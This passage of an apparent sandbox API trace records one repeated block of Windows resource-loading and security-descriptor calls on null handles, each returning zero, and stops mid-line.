[0219.998] LockResource (hResData=0x0) returned 0x0 [0219.998] FreeResource (hResData=0x0) returned 0 [0219.998] FindResourceA (hModule=0x400000, lpName=0x0, lpType=0x3) returned 0x0 [0219.998] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0219.998] LockResource (hResData=0x0) returned 0x0 [0219.998] FreeResource (hResData=0x0) returned 0 [0219.998] GetPrivateObjectSecurity (in: ObjectDescriptor=0x209ddd8, SecurityInformation=0x0, ResultantDescriptor=0x209ddd8, DescriptorLength=0x0, ReturnLength=0x209ddd4 | out: ResultantDescriptor=0x209ddd8, ReturnLength=0x209ddd4) returned 0 [0219.998] GetSecurityDescriptorControl (in: pSecurityDescriptor=0x209ddd8, pControl=0x209ddd0, lpdwRevision=0x209de4c | out: pControl=0x209ddd0, lpdwRevision=0x209de4c) returned 0 [0219.998] IsNLSDefinedString (Function=0x0, dwFlags=0x0, lpVersionInformation=0x0, lpString=0x0, cchStr=0) returned 0 [0219.998] FindResourceA (hModule=0x400000, lpName="", lpType=0xe) returned 0x0 [0219.998] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0219.998] LockResource (hResData=0x0) returned 0x0 [0219.998] FreeResource (hResData=0x0) returned 0 [0219.998] FindResourceA (hModule=0x400000, lpName=0x0, lpType=0x3) returned 0x0 [0219.998] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0219.998] LockResource (hResData=0x0) returned 0x0 [0219.998] FreeResource (hResData=0x0) returned 0 [0219.998] GetPrivateObjectSecurity (in: ObjectDescriptor=0x209ddd8, SecurityInformation=0x0, ResultantDescriptor=0x209ddd8, DescriptorLength=0x0, ReturnLength=0x209ddd4 | out: ResultantDescriptor=0x209ddd8, ReturnLength=0x209ddd4) returned 0 [0219.998] GetSecurityDescriptorControl (in: pSecurityDescriptor=0x209ddd8, pControl=0x209ddd0, lpdwRevision=0x209de4c | out: pControl=0x209ddd0, lpdwRevision=0x209de4c) returned 0 [0219.998] IsNLSDefinedString (Function=0x0, dwFlags=0x0, lpVersionInformation=0x0, lpString=0x0, cchStr=0) returned 0 [0219.998] FindResourceA (hModule=0x400000, lpName="", lpType=0xe) returned 0x0 [0219.998] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0219.998] LockResource (hResData=0x0) returned 0x0 [0219.998] FreeResource (hResData=0x0) returned 0 [0219.998] FindResourceA (hModule=0x400000, lpName=0x0, lpType=0x3) returned 0x0 [0219.998] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0219.999] LockResource (hResData=0x0) returned 0x0 [0219.999] FreeResource (hResData=0x0) returned 0 [0219.999] GetPrivateObjectSecurity (in: ObjectDescriptor=0x209ddd8, SecurityInformation=0x0, ResultantDescriptor=0x209ddd8, DescriptorLength=0x0, ReturnLength=0x209ddd4 | out: ResultantDescriptor=0x209ddd8, ReturnLength=0x209ddd4) returned 0 [0219.999] GetSecurityDescriptorControl (in: pSecurityDescriptor=0x209ddd8, pControl=0x209ddd0, lpdwRevision=0x209de4c | out: pControl=0x209ddd0, lpdwRevision=0x209de4c) returned 0 [0219.999] IsNLSDefinedString (Function=0x0, dwFlags=0x0, lpVersionInformation=0x0, lpString=0x0, cchStr=0) returned 0 [0219.999] FindResourceA (hModule=0x400000, lpName="", lpType=0xe) returned 0x0 [0219.999] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0219.999] LockResource (hResData=0x0) returned 0x0 [0219.999] FreeResource (hResData=0x0) returned 0 [0219.999] FindResourceA (hModule=0x400000, lpName=0x0, lpType=0x3) returned 0x0 [0219.999] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0219.999] LockResource (hResData=0x0) returned 0x0 [0219.999] FreeResource (hResData=0x0) returned 0 [0219.999] GetPrivateObjectSecurity (in: ObjectDescriptor=0x209ddd8, SecurityInformation=0x0, ResultantDescriptor=0x209ddd8, DescriptorLength=0x0, ReturnLength=0x209ddd4 | out: ResultantDescriptor=0x209ddd8, ReturnLength=0x209ddd4) returned 0 [0219.999] GetSecurityDescriptorControl (in: pSecurityDescriptor=0x209ddd8, pControl=0x209ddd0, lpdwRevision=0x209de4c | out: pControl=0x209ddd0, lpdwRevision=0x209de4c) returned 0 [0219.999] IsNLSDefinedString (Function=0x0, dwFlags=0x0, lpVersionInformation=0x0, lpString=0x0, cchStr=0) returned 0 [0219.999] FindResourceA (hModule=0x400000, lpName="", lpType=0xe) returned 0x0 [0219.999] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0219.999] LockResource (hResData=0x0) returned 0x0 [0219.999] FreeResource (hResData=0x0) returned 0 [0219.999] FindResourceA (hModule=0x400000, lpName=0x0, lpType=0x3) returned 0x0 [0219.999] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0219.999] LockResource (hResData=0x0) returned 0x0 [0219.999] FreeResource (hResData=0x0) returned 0 [0219.999] GetPrivateObjectSecurity (in: ObjectDescriptor=0x209ddd8, SecurityInformation=0x0, ResultantDescriptor=0x209ddd8, DescriptorLength=0x0, ReturnLength=0x209ddd4 | out: ResultantDescriptor=0x209ddd8, ReturnLength=0x209ddd4) returned 0 [0219.999] GetSecurityDescriptorControl (in: pSecurityDescriptor=0x209ddd8, pControl=0x209ddd0, lpdwRevision=0x209de4c | out: pControl=0x209ddd0, lpdwRevision=0x209de4c) returned 0 [0219.999] IsNLSDefinedString (Function=0x0, dwFlags=0x0, lpVersionInformation=0x0, lpString=0x0, cchStr=0) returned 0 [0219.999] FindResourceA (hModule=0x400000, lpName="", lpType=0xe) returned 0x0 [0219.999] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0219.999] LockResource (hResData=0x0) returned 0x0 [0219.999] FreeResource (hResData=0x0) returned 0 [0219.999] FindResourceA (hModule=0x400000, lpName=0x0, lpType=0x3) returned 0x0 [0219.999] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0219.999] LockResource (hResData=0x0) returned 0x0 [0219.999] FreeResource (hResData=0x0) returned 0 [0219.999] GetPrivateObjectSecurity (in: ObjectDescriptor=0x209ddd8, SecurityInformation=0x0, ResultantDescriptor=0x209ddd8, DescriptorLength=0x0, ReturnLength=0x209ddd4 | out: ResultantDescriptor=0x209ddd8, ReturnLength=0x209ddd4) returned 0 [0219.999] GetSecurityDescriptorControl (in: pSecurityDescriptor=0x209ddd8, pControl=0x209ddd0, lpdwRevision=0x209de4c | out: pControl=0x209ddd0, lpdwRevision=0x209de4c) returned 0 [0220.000] IsNLSDefinedString (Function=0x0, dwFlags=0x0, lpVersionInformation=0x0, lpString=0x0, cchStr=0) returned 0 [0220.000] FindResourceA (hModule=0x400000, lpName="", lpType=0xe) returned 0x0 [0220.000] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0220.000] LockResource (hResData=0x0) returned 0x0 [0220.000] FreeResource (hResData=0x0) returned 0 [0220.000] FindResourceA (hModule=0x400000, lpName=0x0, lpType=0x3) returned 0x0 [0220.000] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0220.000] LockResource (hResData=0x0) returned 0x0 [0220.000] FreeResource (hResData=0x0) returned 0 [0220.000] GetPrivateObjectSecurity (in: ObjectDescriptor=0x209ddd8, SecurityInformation=0x0, ResultantDescriptor=0x209ddd8, DescriptorLength=0x0, ReturnLength=0x209ddd4 | out: ResultantDescriptor=0x209ddd8, ReturnLength=0x209ddd4) returned 0 [0220.000] GetSecurityDescriptorControl (in: pSecurityDescriptor=0x209ddd8, pControl=0x209ddd0, lpdwRevision=0x209de4c | out: pControl=0x209ddd0, lpdwRevision=0x209de4c) returned 0 [0220.000] IsNLSDefinedString (Function=0x0, dwFlags=0x0, lpVersionInformation=0x0, lpString=0x0, cchStr=0) returned 0 [0220.000] FindResourceA (hModule=0x400000, lpName="", lpType=0xe) returned 0x0 [0220.000] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0220.000] LockResource (hResData=0x0) returned 0x0 [0220.000] FreeResource (hResData=0x0) returned 0 [0220.000] FindResourceA (hModule=0x400000, lpName=0x0, lpType=0x3) returned 0x0 [0220.000] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0220.000] LockResource (hResData=0x0) returned 0x0 [0220.000] FreeResource (hResData=0x0) returned 0 [0220.000] GetPrivateObjectSecurity (in: ObjectDescriptor=0x209ddd8, SecurityInformation=0x0, ResultantDescriptor=0x209ddd8, DescriptorLength=0x0, ReturnLength=0x209ddd4 | out: ResultantDescriptor=0x209ddd8, ReturnLength=0x209ddd4) returned 0 [0220.000] GetSecurityDescriptorControl (in: pSecurityDescriptor=0x209ddd8, pControl=0x209ddd0, lpdwRevision=0x209de4c | out: pControl=0x209ddd0, lpdwRevision=0x209de4c) returned 0 [0220.000] IsNLSDefinedString (Function=0x0, dwFlags=0x0, lpVersionInformation=0x0, lpString=0x0, cchStr=0) returned 0 [0220.000] FindResourceA (hModule=0x400000, lpName="", lpType=0xe) returned 0x0 [0220.000] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0220.000] LockResource (hResData=0x0) returned 0x0 [0220.000] FreeResource (hResData=0x0) returned 0 [0220.000] FindResourceA (hModule=0x400000, lpName=0x0, lpType=0x3) returned 0x0 [0220.000] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0220.000] LockResource (hResData=0x0) returned 0x0 [0220.000] FreeResource (hResData=0x0) returned 0 [0220.000] GetPrivateObjectSecurity (in: ObjectDescriptor=0x209ddd8, SecurityInformation=0x0, ResultantDescriptor=0x209ddd8, DescriptorLength=0x0, ReturnLength=0x209ddd4 | out: ResultantDescriptor=0x209ddd8, ReturnLength=0x209ddd4) returned 0 [0220.000] GetSecurityDescriptorControl (in: pSecurityDescriptor=0x209ddd8, pControl=0x209ddd0, lpdwRevision=0x209de4c | out: pControl=0x209ddd0, lpdwRevision=0x209de4c) returned 0 [0220.000] IsNLSDefinedString (Function=0x0, dwFlags=0x0, lpVersionInformation=0x0, lpString=0x0, cchStr=0) returned 0 [0220.000] FindResourceA (hModule=0x400000, lpName="", lpType=0xe) returned 0x0 [0220.000] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0220.000] LockResource (hResData=0x0) returned 0x0 [0220.001] FreeResource (hResData=0x0) returned 0 [0220.001] FindResourceA (hModule=0x400000, lpName=0x0, lpType=0x3) returned 0x0 [0220.001] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0220.001] LockResource (hResData=0x0) returned 0x0 [0220.001] FreeResource (hResData=0x0) returned 0 [0220.001] GetPrivateObjectSecurity (in: ObjectDescriptor=0x209ddd8, SecurityInformation=0x0, ResultantDescriptor=0x209ddd8, DescriptorLength=0x0, ReturnLength=0x209ddd4 | out: ResultantDescriptor=0x209ddd8, ReturnLength=0x209ddd4) returned 0 [0220.001] GetSecurityDescriptorControl (in: pSecurityDescriptor=0x209ddd8, pControl=0x209ddd0, lpdwRevision=0x209de4c | out: pControl=0x209ddd0, lpdwRevision=0x209de4c) returned 0 [0220.001] IsNLSDefinedString (Function=0x0, dwFlags=0x0, lpVersionInformation=0x0, lpString=0x0, cchStr=0) returned 0 [0220.001] FindResourceA (hModule=0x400000, lpName="", lpType=0xe) returned 0x0 [0220.001] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0220.001] LockResource (hResData=0x0) returned 0x0 [0220.001] FreeResource (hResData=0x0) returned 0 [0220.001] FindResourceA (hModule=0x400000, lpName=0x0, lpType=0x3) returned 0x0 [0220.001] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0220.001] LockResource (hResData=0x0) returned 0x0 [0220.001] FreeResource (hResData=0x0) returned 0 [0220.001] GetPrivateObjectSecurity (in: ObjectDescriptor=0x209ddd8, SecurityInformation=0x0, ResultantDescriptor=0x209ddd8, DescriptorLength=0x0, ReturnLength=0x209ddd4 | out: ResultantDescriptor=0x209ddd8, ReturnLength=0x209ddd4) returned 0 [0220.001] GetSecurityDescriptorControl (in: pSecurityDescriptor=0x209ddd8, pControl=0x209ddd0, lpdwRevision=0x209de4c | out: pControl=0x209ddd0, lpdwRevision=0x209de4c) returned 0 [0220.001] IsNLSDefinedString (Function=0x0, dwFlags=0x0, lpVersionInformation=0x0, lpString=0x0, cchStr=0) returned 0 [0220.001] FindResourceA (hModule=0x400000, lpName="", lpType=0xe) returned 0x0 [0220.001] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0220.001] LockResource (hResData=0x0) returned 0x0 [0220.001] FreeResource (hResData=0x0) returned 0 [0220.001] FindResourceA (hModule=0x400000, lpName=0x0, lpType=0x3) returned 0x0 [0220.001] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0220.001] LockResource (hResData=0x0) returned 0x0 [0220.001] FreeResource (hResData=0x0) returned 0 [0220.001] GetPrivateObjectSecurity (in: ObjectDescriptor=0x209ddd8, SecurityInformation=0x0, ResultantDescriptor=0x209ddd8, DescriptorLength=0x0, ReturnLength=0x209ddd4 | out: ResultantDescriptor=0x209ddd8, ReturnLength=0x209ddd4) returned 0 [0220.001] GetSecurityDescriptorControl (in: pSecurityDescriptor=0x209ddd8, pControl=0x209ddd0, lpdwRevision=0x209de4c | out: pControl=0x209ddd0, lpdwRevision=0x209de4c) returned 0 [0220.001] IsNLSDefinedString (Function=0x0, dwFlags=0x0, lpVersionInformation=0x0, lpString=0x0, cchStr=0) returned 0 [0220.001] FindResourceA (hModule=0x400000, lpName="", lpType=0xe) returned 0x0 [0220.001] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0220.001] LockResource (hResData=0x0) returned 0x0 [0220.001] FreeResource (hResData=0x0) returned 0 [0220.001] FindResourceA (hModule=0x400000, lpName=0x0, lpType=0x3) returned 0x0 [0220.001] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0220.001] LockResource (hResData=0x0) returned 0x0 [0220.002] FreeResource (hResData=0x0) returned 0 [0220.002] GetPrivateObjectSecurity (in: ObjectDescriptor=0x209ddd8, SecurityInformation=0x0, ResultantDescriptor=0x209ddd8, DescriptorLength=0x0, ReturnLength=0x209ddd4 | out: ResultantDescriptor=0x209ddd8, ReturnLength=0x209ddd4) returned 0 [0220.002] GetSecurityDescriptorControl (in: pSecurityDescriptor=0x209ddd8, pControl=0x209ddd0, lpdwRevision=0x209de4c | out: pControl=0x209ddd0, lpdwRevision=0x209de4c) returned 0 [0220.002] IsNLSDefinedString (Function=0x0, dwFlags=0x0, lpVersionInformation=0x0, lpString=0x0, cchStr=0) returned 0 [0220.002] FindResourceA (hModule=0x400000, lpName="", lpType=0xe) returned 0x0 [0220.002] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0220.002] LockResource (hResData=0x0) returned 0x0 [0220.002] FreeResource (hResData=0x0) returned 0 [0220.002] FindResourceA (hModule=0x400000, lpName=0x0, lpType=0x3) returned 0x0 [0220.002] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0220.002] LockResource (hResData=0x0) returned 0x0 [0220.002] FreeResource (hResData=0x0) returned 0 [0220.002] GetPrivateObjectSecurity (in: ObjectDescriptor=0x209ddd8, SecurityInformation=0x0, ResultantDescriptor=0x209ddd8, DescriptorLength=0x0, ReturnLength=0x209ddd4 | out: ResultantDescriptor=0x209ddd8, ReturnLength=0x209ddd4) returned 0 [0220.002] GetSecurityDescriptorControl (in: pSecurityDescriptor=0x209ddd8, pControl=0x209ddd0, lpdwRevision=0x209de4c | out: pControl=0x209ddd0, lpdwRevision=0x209de4c) returned 0 [0220.002] IsNLSDefinedString (Function=0x0, dwFlags=0x0, lpVersionInformation=0x0, lpString=0x0, cchStr=0) returned 0 [0220.002] FindResourceA (hModule=0x400000, lpName="", lpType=0xe) returned 0x0 [0220.002] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0220.002] LockResource (hResData=0x0) returned 0x0 [0220.002] FreeResource (hResData=0x0) returned 0 [0220.002] FindResourceA (hModule=0x400000, lpName=0x0, lpType=0x3) returned 0x0 [0220.002] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0220.002] LockResource (hResData=0x0) returned 0x0 [0220.002] FreeResource (hResData=0x0) returned 0 [0220.002] GetPrivateObjectSecurity (in: ObjectDescriptor=0x209ddd8, SecurityInformation=0x0, ResultantDescriptor=0x209ddd8, DescriptorLength=0x0, ReturnLength=0x209ddd4 | out: ResultantDescriptor=0x209ddd8, ReturnLength=0x209ddd4) returned 0 [0220.002] GetSecurityDescriptorControl (in: pSecurityDescriptor=0x209ddd8, pControl=0x209ddd0, lpdwRevision=0x209de4c | out: pControl=0x209ddd0, lpdwRevision=0x209de4c) returned 0 [0220.002] IsNLSDefinedString (Function=0x0, dwFlags=0x0, lpVersionInformation=0x0, lpString=0x0, cchStr=0) returned 0 [0220.002] FindResourceA (hModule=0x400000, lpName="", lpType=0xe) returned 0x0 [0220.002] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0220.002] LockResource (hResData=0x0) returned 0x0 [0220.002] FreeResource (hResData=0x0) returned 0 [0220.002] FindResourceA (hModule=0x400000, lpName=0x0, lpType=0x3) returned 0x0 [0220.002] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0220.002] LockResource (hResData=0x0) returned 0x0 [0220.002] FreeResource (hResData=0x0) returned 0 [0220.002] GetPrivateObjectSecurity (in: ObjectDescriptor=0x209ddd8, SecurityInformation=0x0, ResultantDescriptor=0x209ddd8, DescriptorLength=0x0, ReturnLength=0x209ddd4 | out: ResultantDescriptor=0x209ddd8, ReturnLength=0x209ddd4) returned 0 [0220.002] GetSecurityDescriptorControl (in: pSecurityDescriptor=0x209ddd8, pControl=0x209ddd0, lpdwRevision=0x209de4c | out: pControl=0x209ddd0, lpdwRevision=0x209de4c) returned 0 [0220.002] IsNLSDefinedString (Function=0x0, dwFlags=0x0, lpVersionInformation=0x0, lpString=0x0, cchStr=0) returned 0 [0220.002] FindResourceA (hModule=0x400000, lpName="", lpType=0xe) returned 0x0 [0220.003] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0220.003] LockResource (hResData=0x0) returned 0x0 [0220.003] FreeResource (hResData=0x0) returned 0 [0220.003] FindResourceA (hModule=0x400000, lpName=0x0, lpType=0x3) returned 0x0 [0220.003] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0220.003] LockResource (hResData=0x0) returned 0x0 [0220.003] FreeResource (hResData=0x0) returned 0 [0220.003] GetPrivateObjectSecurity (in: ObjectDescriptor=0x209ddd8, SecurityInformation=0x0, ResultantDescriptor=0x209ddd8, DescriptorLength=0x0, ReturnLength=0x209ddd4 | out: ResultantDescriptor=0x209ddd8, ReturnLength=0x209ddd4) returned 0 [0220.003] GetSecurityDescriptorControl (in: pSecurityDescriptor=0x209ddd8, pControl=0x209ddd0, lpdwRevision=0x209de4c | out: pControl=0x209ddd0, lpdwRevision=0x209de4c) returned 0 [0220.003] IsNLSDefinedString (Function=0x0, dwFlags=0x0, lpVersionInformation=0x0, lpString=0x0, cchStr=0) returned 0 [0220.003] FindResourceA (hModule=0x400000, lpName="", lpType=0xe) returned 0x0 [0220.003] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0220.003] LockResource (hResData=0x0) returned 0x0 [0220.003] FreeResource (hResData=0x0) returned 0 [0220.003] FindResourceA (hModule=0x400000, lpName=0x0, lpType=0x3) returned 0x0 [0220.003] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0220.003] LockResource (hResData=0x0) returned 0x0 [0220.003] FreeResource (hResData=0x0) returned 0 [0220.003] GetPrivateObjectSecurity (in: ObjectDescriptor=0x209ddd8, SecurityInformation=0x0, ResultantDescriptor=0x209ddd8, DescriptorLength=0x0, ReturnLength=0x209ddd4 | out: ResultantDescriptor=0x209ddd8, ReturnLength=0x209ddd4) returned 0 [0220.003] GetSecurityDescriptorControl (in: pSecurityDescriptor=0x209ddd8, pControl=0x209ddd0, lpdwRevision=0x209de4c | out: pControl=0x209ddd0, lpdwRevision=0x209de4c) returned 0 [0220.003] IsNLSDefinedString (Function=0x0, dwFlags=0x0, lpVersionInformation=0x0, lpString=0x0, cchStr=0) returned 0 [0220.003] FindResourceA (hModule=0x400000, lpName="", lpType=0xe) returned 0x0 [0220.003] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0220.003] LockResource (hResData=0x0) returned 0x0 [0220.003] FreeResource (hResData=0x0) returned 0 [0220.003] FindResourceA (hModule=0x400000, lpName=0x0, lpType=0x3) returned 0x0 [0220.003] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0220.003] LockResource (hResData=0x0) returned 0x0 [0220.003] FreeResource (hResData=0x0) returned 0 [0220.003] GetPrivateObjectSecurity (in: ObjectDescriptor=0x209ddd8, SecurityInformation=0x0, ResultantDescriptor=0x209ddd8, DescriptorLength=0x0, ReturnLength=0x209ddd4 | out: ResultantDescriptor=0x209ddd8, ReturnLength=0x209ddd4) returned 0 [0220.003] GetSecurityDescriptorControl (in: pSecurityDescriptor=0x209ddd8, pControl=0x209ddd0, lpdwRevision=0x209de4c | out: pControl=0x209ddd0, lpdwRevision=0x209de4c) returned 0 [0220.003] IsNLSDefinedString (Function=0x0, dwFlags=0x0, lpVersionInformation=0x0, lpString=0x0, cchStr=0) returned 0 [0220.003] FindResourceA (hModule=0x400000, lpName="", lpType=0xe) returned 0x0 [0220.003] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0220.003] LockResource (hResData=0x0) returned 0x0 [0220.003] FreeResource (hResData=0x0) returned 0 [0220.004] FindResourceA (hModule=0x400000, lpName=0x0, lpType=0x3) returned 0x0 [0220.004] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0220.004] LockResource (hResData=0x0) returned 0x0 [0220.004] FreeResource (hResData=0x0) returned 0 [0220.004] GetPrivateObjectSecurity (in: ObjectDescriptor=0x209ddd8, SecurityInformation=0x0, ResultantDescriptor=0x209ddd8, DescriptorLength=0x0, ReturnLength=0x209ddd4 | out: ResultantDescriptor=0x209ddd8, ReturnLength=0x209ddd4) returned 0 [0220.004] GetSecurityDescriptorControl (in: pSecurityDescriptor=0x209ddd8, pControl=0x209ddd0, lpdwRevision=0x209de4c | out: pControl=0x209ddd0, lpdwRevision=0x209de4c) returned 0 [0220.004] IsNLSDefinedString (Function=0x0, dwFlags=0x0, lpVersionInformation=0x0, lpString=0x0, cchStr=0) returned 0 [0220.004] FindResourceA (hModule=0x400000, lpName="", lpType=0xe) returned 0x0 [0220.004] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0220.004] LockResource (hResData=0x0) returned 0x0 [0220.004] FreeResource (hResData=0x0) returned 0 [0220.004] FindResourceA (hModule=0x400000, lpName=0x0, lpType=0x3) returned 0x0 [0220.004] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0220.004] LockResource (hResData=0x0) returned 0x0 [0220.004] FreeResource (hResData=0x0) returned 0 [0220.004] GetPrivateObjectSecurity (in: ObjectDescriptor=0x209ddd8, SecurityInformation=0x0, ResultantDescriptor=0x209ddd8, DescriptorLength=0x0, ReturnLength=0x209ddd4 | out: ResultantDescriptor=0x209ddd8, ReturnLength=0x209ddd4) returned 0 [0220.004] GetSecurityDescriptorControl (in: pSecurityDescriptor=0x209ddd8, pControl=0x209ddd0, lpdwRevision=0x209de4c | out: pControl=0x209ddd0, lpdwRevision=0x209de4c) returned 0 [0220.004] IsNLSDefinedString (Function=0x0, dwFlags=0x0, lpVersionInformation=0x0, lpString=0x0, cchStr=0) returned 0 [0220.004] FindResourceA (hModule=0x400000, lpName="", lpType=0xe) returned 0x0 [0220.004] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0220.004] LockResource (hResData=0x0) returned 0x0 [0220.004] FreeResource (hResData=0x0) returned 0 [0220.004] FindResourceA (hModule=0x400000, lpName=0x0, lpType=0x3) returned 0x0 [0220.004] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0220.004] LockResource (hResData=0x0) returned 0x0 [0220.004] FreeResource (hResData=0x0) returned 0 [0220.004] GetPrivateObjectSecurity (in: ObjectDescriptor=0x209ddd8, SecurityInformation=0x0, ResultantDescriptor=0x209ddd8, DescriptorLength=0x0, ReturnLength=0x209ddd4 | out: ResultantDescriptor=0x209ddd8, ReturnLength=0x209ddd4) returned 0 [0220.004] GetSecurityDescriptorControl (in: pSecurityDescriptor=0x209ddd8, pControl=0x209ddd0, lpdwRevision=0x209de4c | out: pControl=0x209ddd0, lpdwRevision=0x209de4c) returned 0 [0220.004] IsNLSDefinedString (Function=0x0, dwFlags=0x0, lpVersionInformation=0x0, lpString=0x0, cchStr=0) returned 0 [0220.004] FindResourceA (hModule=0x400000, lpName="", lpType=0xe) returned 0x0 [0220.004] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0220.004] LockResource (hResData=0x0) returned 0x0 [0220.004] FreeResource (hResData=0x0) returned 0 [0220.004] FindResourceA (hModule=0x400000, lpName=0x0, lpType=0x3) returned 0x0 [0220.004] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0220.004] LockResource (hResData=0x0) returned 0x0 [0220.004] FreeResource (hResData=0x0) returned 0 [0220.004] GetPrivateObjectSecurity (in: ObjectDescriptor=0x209ddd8, SecurityInformation=0x0, ResultantDescriptor=0x209ddd8, DescriptorLength=0x0, ReturnLength=0x209ddd4 | out: ResultantDescriptor=0x209ddd8, ReturnLength=0x209ddd4) returned 0 [0220.004] GetSecurityDescriptorControl (in: pSecurityDescriptor=0x209ddd8, pControl=0x209ddd0, lpdwRevision=0x209de4c | out: pControl=0x209ddd0, lpdwRevision=0x209de4c) returned 0 [0220.005] IsNLSDefinedString (Function=0x0, dwFlags=0x0, lpVersionInformation=0x0, lpString=0x0, cchStr=0) returned 0 [0220.005] FindResourceA (hModule=0x400000, lpName="", lpType=0xe) returned 0x0 [0220.005] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0220.005] LockResource (hResData=0x0) returned 0x0 [0220.005] FreeResource (hResData=0x0) returned 0 [0220.005] FindResourceA (hModule=0x400000, lpName=0x0, lpType=0x3) returned 0x0 [0220.005] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0220.005] LockResource (hResData=0x0) returned 0x0 [0220.005] FreeResource (hResData=0x0) returned 0 [0220.005] GetPrivateObjectSecurity (in: ObjectDescriptor=0x209ddd8, SecurityInformation=0x0, ResultantDescriptor=0x209ddd8, DescriptorLength=0x0, ReturnLength=0x209ddd4 | out: ResultantDescriptor=0x209ddd8, ReturnLength=0x209ddd4) returned 0 [0220.005] GetSecurityDescriptorControl (in: pSecurityDescriptor=0x209ddd8, pControl=0x209ddd0, lpdwRevision=0x209de4c | out: pControl=0x209ddd0, lpdwRevision=0x209de4c) returned 0 [0220.005] IsNLSDefinedString (Function=0x0, dwFlags=0x0, lpVersionInformation=0x0, lpString=0x0, cchStr=0) returned 0 [0220.005] FindResourceA (hModule=0x400000, lpName="", lpType=0xe) returned 0x0 [0220.005] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0220.005] LockResource (hResData=0x0) returned 0x0 [0220.005] FreeResource (hResData=0x0) returned 0 [0220.005] FindResourceA (hModule=0x400000, lpName=0x0, lpType=0x3) returned 0x0 [0220.005] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0220.005] LockResource (hResData=0x0) returned 0x0 [0220.005] FreeResource (hResData=0x0) returned 0 [0220.005] GetPrivateObjectSecurity (in: ObjectDescriptor=0x209ddd8, SecurityInformation=0x0, ResultantDescriptor=0x209ddd8, DescriptorLength=0x0, ReturnLength=0x209ddd4 | out: ResultantDescriptor=0x209ddd8, ReturnLength=0x209ddd4) returned 0 [0220.005] GetSecurityDescriptorControl (in: pSecurityDescriptor=0x209ddd8, pControl=0x209ddd0, lpdwRevision=0x209de4c | out: pControl=0x209ddd0, lpdwRevision=0x209de4c) returned 0 [0220.005] IsNLSDefinedString (Function=0x0, dwFlags=0x0, lpVersionInformation=0x0, lpString=0x0, cchStr=0) returned 0 [0220.005] FindResourceA (hModule=0x400000, lpName="", lpType=0xe) returned 0x0 [0220.005] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0220.005] LockResource (hResData=0x0) returned 0x0 [0220.006] FreeResource (hResData=0x0) returned 0 [0220.006] FindResourceA (hModule=0x400000, lpName=0x0, lpType=0x3) returned 0x0 [0220.006] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0220.006] LockResource (hResData=0x0) returned 0x0 [0220.006] FreeResource (hResData=0x0) returned 0 [0220.006] GetPrivateObjectSecurity (in: ObjectDescriptor=0x209ddd8, SecurityInformation=0x0, ResultantDescriptor=0x209ddd8, DescriptorLength=0x0, ReturnLength=0x209ddd4 | out: ResultantDescriptor=0x209ddd8, ReturnLength=0x209ddd4) returned 0 [0220.006] GetSecurityDescriptorControl (in: pSecurityDescriptor=0x209ddd8, pControl=0x209ddd0, lpdwRevision=0x209de4c | out: pControl=0x209ddd0, lpdwRevision=0x209de4c) returned 0 [0220.006] IsNLSDefinedString (Function=0x0, dwFlags=0x0, lpVersionInformation=0x0, lpString=0x0, cchStr=0) returned 0 [0220.006] FindResourceA (hModule=0x400000, lpName="", lpType=0xe) returned 0x0 [0220.006] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0220.006] LockResource (hResData=0x0) returned 0x0 [0220.006] FreeResource (hResData=0x0) returned 0 [0220.006] FindResourceA (hModule=0x400000, lpName=0x0, lpType=0x3) returned 0x0 [0220.006] LoadResource (hModule=0x400000, hResInfo=0x0) 